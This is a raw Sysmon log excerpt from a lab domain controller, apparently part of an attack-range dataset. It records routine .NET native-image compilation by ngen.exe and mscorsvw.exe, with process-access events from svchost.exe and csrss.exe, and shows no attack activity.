13:48:23.576{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A7-6005-F102-00000000A301}3812C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007164Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:23.513{59A5CD1D-91A7-6005-F002-00000000A301}3784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\ec8-0\UIAutomationProvider.dll2021-01-18 13:48:23.513 10341000x80000000000000007163Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.435{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A7-6005-F002-00000000A301}3784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007162Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.419{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91A7-6005-F002-00000000A301}3784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007161Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.419{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A7-6005-F002-00000000A301}3784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007160Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.388{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A7-6005-EF02-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007159Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.373{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91A7-6005-EF02-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007158Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:23.373{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A7-6005-EF02-00000000A301}1556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007157Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:23.295{59A5CD1D-91A6-6005-EE02-00000000A301}4100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1004-0\UIAutomationClientsideProviders.dll2021-01-18 13:48:23.295 10341000x80000000000000007193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.654{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A8-6005-F902-00000000A301}3152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.654{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91A8-6005-F902-00000000A301}3152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.654{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A8-6005-F902-00000000A301}3152C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.591{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A8-6005-F802-00000000A301}4416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.576{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91A8-6005-F802-00000000A301}4416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007188Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.576{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A8-6005-F802-00000000A301}4416C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007187Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.544{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A8-6005-F702-00000000A301}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007186Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.544{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91A8-6005-F702-00000000A301}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007185Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.544{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A8-6005-F702-00000000A301}3724C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007184Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.451{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A8-6005-F602-00000000A301}4764C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007183Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.435{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91A8-6005-F602-00000000A301}4764C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007182Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.435{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A8-6005-F602-00000000A301}4764C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007181Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.373{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A8-6005-F502-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007180Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.357{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-91A8-6005-F502-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007179Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.357{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-91A8-6005-F502-00000000A301}4696C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007178Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:48:24.294{59A5CD1D-91A8-6005-F402-00000000A301}4796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\12bc-0\WindowsFormsIntegration.dll2021-01-18 13:48:24.294 10341000x80000000000000007177Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:24.044{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91A8-6005-F402-00000000A301}4796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\n